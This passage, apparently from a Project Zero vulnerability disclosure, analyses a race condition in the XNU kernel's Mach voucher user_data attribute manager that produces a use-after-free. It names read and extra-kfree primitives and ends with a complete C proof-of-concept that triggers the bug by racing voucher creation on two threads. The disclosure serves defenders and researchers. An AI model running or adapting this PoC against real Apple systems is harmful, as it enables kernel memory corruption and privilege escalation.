As mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.

If you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.

That means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.
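To make the lost update concrete without relying on timing, the following sketch replays the two interleavings by hand. Each simulated thread has one register, and the increment is split into its load, add and store steps. All names are hypothetical and nothing here runs concurrently; it only shows the arithmetic.

```c
#include <assert.h>
#include <stdint.h>

struct cpu { uint32_t reg; };  /* one register per simulated thread */

void step_load(struct cpu *c, const uint32_t *mem)  { c->reg = *mem; }
void step_add(struct cpu *c)                        { c->reg += 1; }
void step_store(const struct cpu *c, uint32_t *mem) { *mem = c->reg; }

/* Both threads load before either stores: one increment is lost. */
uint32_t overlapped_increments(uint32_t e_made) {
    struct cpu a, b;
    step_load(&a, &e_made);
    step_load(&b, &e_made);
    step_add(&a);
    step_add(&b);
    step_store(&a, &e_made);
    step_store(&b, &e_made);
    return e_made;
}

/* The ordering that holding a lock across the increment would force. */
uint32_t serialized_increments(uint32_t e_made) {
    struct cpu a, b;
    step_load(&a, &e_made);
    step_add(&a);
    step_store(&a, &e_made);
    step_load(&b, &e_made);
    step_add(&b);
    step_store(&b, &e_made);
    return e_made;
}
```

Starting from 1, the overlapped ordering ends at 2 while the serialized ordering ends at 3.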

But remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.

Let's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, thread A doesn't free the new_value held on thread B's stack:

kr = (ivam->ivam_get_value)(

ivam, key, command,

previous_vals, previous_vals_count,

content, content_size,

&new_value, &new_flag, &new_value_voucher);

if (KERN_SUCCESS != kr) {

ivac_release(ivac);

return kr;

}

... /* WINDOW */

val_index = ivace_reference_by_value(ivac, new_value, new_flag);

And the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.

This is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.

So how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! Suppose that in the steady state e_made is one less than ivace_made, and we then race two threads: thread A, which is dropping the last reference (ivace_refs), and thread B, which is attempting to revive the ivace and is in the WINDOW shown above. e_made still gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment), e_made is now exactly equal to ivace_made. That's the exact condition which is supposed to indicate that no thread can possibly be in the WINDOW shown above and that it's safe to free the user_data_value_element, which is in fact live on thread B's stack!

Thread B then ends up with a revived ivace with a dangling ivace_value.
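The flipped check can be replayed step by step in a single-threaded model. This is a hedged sketch rather than a reproduction of the kernel paths: the struct and function names are hypothetical, the starting counts (ivace_refs of 1, ivace_made of 2) are arbitrary, and the interleaving is fixed by hand with thread B sitting in WINDOW while thread A releases.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

struct model_elem  { uint32_t e_made; bool freed; };
struct model_ivace { uint32_t refs; uint32_t made; struct model_elem *value; };

/* Frees the element only when the caller's count matches e_made. */
bool model_release_value(struct model_elem *elem, uint32_t sync) {
    if (sync != elem->e_made) {
        return false;
    }
    elem->freed = true;
    return true;
}

/*
 * lost_increments is how many e_made updates were previously lost to
 * the unlocked REDEEM increment (0 for a healthy system, at most 2 here).
 * Returns true if thread B ends up holding a freed element.
 */
bool race_frees_live_element(uint32_t lost_increments) {
    struct model_elem elem = { .e_made = 2 - lost_increments, .freed = false };
    struct model_ivace ivace = { .refs = 1, .made = 2, .value = &elem };

    /* Thread B: get_value finds the element, bumps e_made, enters WINDOW. */
    struct model_elem *b_new_value = &elem;
    b_new_value->e_made++;

    /* Thread A: drops the last reference, calls out with its made snapshot. */
    ivace.refs--;
    uint32_t made = ivace.made;
    (void)model_release_value(ivace.value, made);

    /* Thread B: leaves WINDOW and takes its reference on the ivace. */
    ivace.refs++;
    ivace.made++;

    return b_new_value->freed;
}
```

With no lost increment the release is refused and thread B's element stays valid; with a single lost increment the comparison succeeds and thread B is left holding freed memory.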

This gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.

With the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.

Conclusions

It's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:

1) Just read the code

Possible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <string.h>

#include <stdint.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

mach_port_t voucher = MACH_PORT_NULL;

kern_return_t kr = host_create_mach_voucher(

mach_host_self(),

(mach_voucher_attr_raw_recipe_array_t)recipe,

recipe_size,

&voucher);

if (kr != KERN_SUCCESS) {

printf("failed to create voucher from recipe\n");

}

return voucher;

}

static void*

create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

recipe->content_size = len;

uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

memcpy(content_buf, buf, len);

*template_size_out = recipe_size;

return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

recipe->content_size = len;

uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

memcpy(content_buf, buf, len);

mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

*template_size_out = recipe_size;

return recipe;

}

struct recipe_template_meta {

void* recipe;

size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {0};

struct recipe_template_meta redeem_recipe_template = {0};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

for (int i = 0; i < iter_limit; i++) {

mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

mach_port_deallocate(mach_task_self(), voucher_port);

}

return NULL;

}

void sploit_3() {

while(1) {

// choose a userdata size:

uint32_t userdata_size = (arc4random() % 2040)+8;

userdata_size += 7;

userdata_size &= (~7);

printf("userdata size: 0x%x\n", userdata_size);

uint8_t* userdata_buffer = calloc(userdata_size, 1);

((uint32_t*)userdata_buffer)[0] = arc4random();

((uint32_t*)userdata_buffer)[1] = arc4random();

// build the templates:

single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

free(userdata_buffer);

pthread_t single_recipe_thread;

pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

pthread_t redeem_recipe_thread;

pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

pthread_join(single_recipe_thread, NULL);

pthread_join(redeem_recipe_thread, NULL);

free(single_recipe_template.recipe);

free(redeem_recipe_template.recipe);

}

}

int main(int argc, char** argv) {

sploit_3();

}